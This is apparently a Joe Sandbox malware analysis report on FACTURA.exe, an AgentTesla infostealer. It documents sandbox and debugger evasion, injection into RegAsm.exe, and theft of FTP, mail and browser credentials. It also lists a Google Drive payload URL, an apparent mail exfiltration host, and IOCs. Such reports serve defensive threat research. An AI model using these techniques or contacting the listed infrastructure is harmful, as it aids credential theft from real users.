            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\FACTURA.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\FACTURA.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: FACTURA.exe, 00000001.00000002.17251736149.00000000007D0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.21791838141.0000000000BF0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: RegAsm.exe, 00000005.00000002.21791838141.0000000000BF0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1_9GRCZAMVWIYOZMQGYLCLU_IMIL5MBHKWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
            Source: FACTURA.exe, 00000001.00000002.17251897212.0000000000803000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: FACTURA.exe, 00000001.00000002.17251736149.00000000007D0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3176Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\FACTURA.exeSystem information queried: ModuleInformation
            Source: RegAsm.exe, 00000005.00000002.21793120359.00000000010E0000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW"$
            Source: FACTURA.exe, 00000001.00000002.17251736149.00000000007D0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: RegAsm.exe, 00000005.00000002.21793120359.00000000010E0000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: RegAsm.exe, 00000005.00000002.21791838141.0000000000BF0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1_9grCzaMvwiyOZmqGYlclu_imIL5MBHKwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: FACTURA.exe, 00000001.00000002.17251736149.00000000007D0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.21791838141.0000000000BF0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: RegAsm.exe, 00000005.00000002.21792809457.000000000109C000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW`
            Source: FACTURA.exe, 00000001.00000002.17251897212.0000000000803000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\FACTURA.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\FACTURA.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E46946 KiUserExceptionDispatcher,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\FACTURA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F00000
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe'
            Source: RegAsm.exe, 00000005.00000002.21794731928.00000000016E1000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000005.00000002.21794731928.00000000016E1000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000005.00000002.21794731928.00000000016E1000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000005.00000002.21794731928.00000000016E1000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 392, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 392, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 392, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            FACTURA.exe25%VirustotalBrowse
            FACTURA.exe27%ReversingLabsWin32.Trojan.Mucc

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://7IjlG5MRJ8GuV06p17GS.com0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%VirustotalBrowse
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            http://mail.reyesyasociados.com0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://DXdVhu.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.185.206
            truefalse
              high
              googlehosted.l.googleusercontent.com
              142.250.186.33
              truefalse
                high
                mail.reyesyasociados.com
                109.169.39.245
                truetrue
                  unknown
                  doc-08-50-docs.googleusercontent.com
                  unknown
                  unknownfalse
                    high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://doc-08-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1bb12mp9hm55ekloh95nskj64c1gjp2b/1632812250000/00519186742208262786/*/1_9grCzaMvwiyOZmqGYlclu_imIL5MBHK?e=downloadfalse
                      high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNSRegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://7IjlG5MRJ8GuV06p17GS.comRegAsm.exe, 00000005.00000002.21804333470.000000001DFFD000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.21804041737.000000001DFD2000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.21803487459.000000001DF6C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://sectigo.com/CPS0RegAsm.exe, 00000005.00000002.21809297485.0000000020060000.00000004.00000001.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://mail.reyesyasociados.comRegAsm.exe, 00000005.00000002.21804041737.000000001DFD2000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://drive.google.com/RegAsm.exe, 00000005.00000002.21792632666.0000000001078000.00000004.00000020.sdmpfalse
                        high
                        https://doc-08-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1bb12mp9RegAsm.exe, 00000005.00000003.17225649108.00000000010F1000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.17229535337.00000000010F8000.00000004.00000001.sdmpfalse
                          high
                          https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000005.00000002.21802999084.000000001DF12000.00000004.00000001.sdmpfalse
                            high
                            http://DXdVhu.comRegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://doc-08-50-docs.googleusercontent.com/%%doc-08-50-docs.googleusercontent.comRegAsm.exe, 00000005.00000003.18145548653.00000000010EE000.00000004.00000001.sdmpfalse
                              high
                              https://doc-08-50-docs.googleusercontent.com/RegAsm.exe, 00000005.00000003.18145277985.00000000010BF000.00000004.00000001.sdmpfalse
                                high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                142.250.185.206
                                drive.google.comUnited States
                                15169GOOGLEUSfalse
                                109.169.39.245
                                mail.reyesyasociados.comUnited Kingdom
                                20860IOMART-ASGBtrue
                                142.250.186.33
                                googlehosted.l.googleusercontent.comUnited States
                                15169GOOGLEUSfalse

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:1380
                                Start date:28.09.2021
                                Start time:08:55:28
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 12m 34s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:FACTURA.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:24
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.spre.troj.spyw.evad.winEXE@4/1@3/3
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 95%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.82.19.171, 20.82.209.183, 52.109.12.18, 20.50.102.62
                                • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wd-prod-cp.trafficmanager.net, arc.msn.com, nexusrules.officeapps.live.com, prod.nexusrules.live.com.akadns.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                08:58:16API Interceptor2664x Sleep call for process: RegAsm.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                109.169.39.245LISTA DE PEDIDO DE COMPRA.exeGet hashmaliciousBrowse
                                  Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                    BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                      BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                        Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          mail.reyesyasociados.comLISTA DE PEDIDO DE COMPRA.exeGet hashmaliciousBrowse
                                          • 109.169.39.245
                                          Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                          • 109.169.39.245
                                          BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                          • 109.169.39.245
                                          BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                          • 109.169.39.245
                                          Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse
                                          • 109.169.39.245

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          IOMART-ASGBLISTA DE PEDIDO DE COMPRA.exeGet hashmaliciousBrowse
                                          • 109.169.39.245
                                          Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                          • 109.169.39.245
                                          4czqYWTUq8Get hashmaliciousBrowse
                                          • 217.147.86.101
                                          b8uTZxALDhGet hashmaliciousBrowse
                                          • 176.56.205.97
                                          XMae11M5ygGet hashmaliciousBrowse
                                          • 109.75.167.7
                                          BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                          • 109.169.39.245
                                          shinto.x86Get hashmaliciousBrowse
                                          • 217.194.212.165
                                          BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                          • 109.169.39.245
                                          Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse
                                          • 109.169.39.245
                                          QkAgFhbO4a.exeGet hashmaliciousBrowse
                                          • 109.169.33.163
                                          ac1khvFT2V.exeGet hashmaliciousBrowse
                                          • 78.129.165.118
                                          Colis_____FR6627222019J01.vbsGet hashmaliciousBrowse
                                          • 5.77.41.150
                                          DriverPack-17-Online_749652650.1631058953__eqiqpdyx4midqk9.exeGet hashmaliciousBrowse
                                          • 87.117.239.150
                                          IcdLXZ5hGEGet hashmaliciousBrowse
                                          • 176.56.205.122
                                          xOMeOjIk7V.exeGet hashmaliciousBrowse
                                          • 78.129.249.105
                                          KW3VrbX3Av.exeGet hashmaliciousBrowse
                                          • 217.194.215.58
                                          EcyvrSp565.exeGet hashmaliciousBrowse
                                          • 217.194.215.58
                                          vigmCKdmz9Get hashmaliciousBrowse
                                          • 31.216.57.33
                                          T9V927Bbvx.exeGet hashmaliciousBrowse
                                          • 78.129.249.105
                                          fmPwEX2Lc1.exeGet hashmaliciousBrowse
                                          • 78.129.249.105

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          37f463bf4616ecd445d4a1937da06e19Hesap Hareketleri 28-09-2021.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          InvPixcareer.-289609891_20210927.xlsbGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          RCnbEaKhdD.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          X9iTxI3QtS.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          lcZoxd23lU.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          eh1Jd9oktL.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          Gbb8oluLdo.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          rO27azgdXP.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          8FjZ4i5ZYi.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          waffle_lol.xlsGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          e1RA3RFD7Q.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          f1iHAqCbBt.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          NEW AIR COURIER.htmlGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          Q5yOweGeTg.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          Unreal.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          EITyS0c1l1.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          fTset285bI.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          ejecutable.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          gmT455QDI6.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33
                                          IdI36XfAJc.exeGet hashmaliciousBrowse
                                          • 142.250.185.206
                                          • 142.250.186.33

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          \Device\ConDrv
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):30
                                          Entropy (8bit):3.964735178725505
                                          Encrypted:false
                                          SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                          MD5:9F754B47B351EF0FC32527B541420595
                                          SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                          SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                          SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: NordVPN directory not found!..

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):5.825848109421746
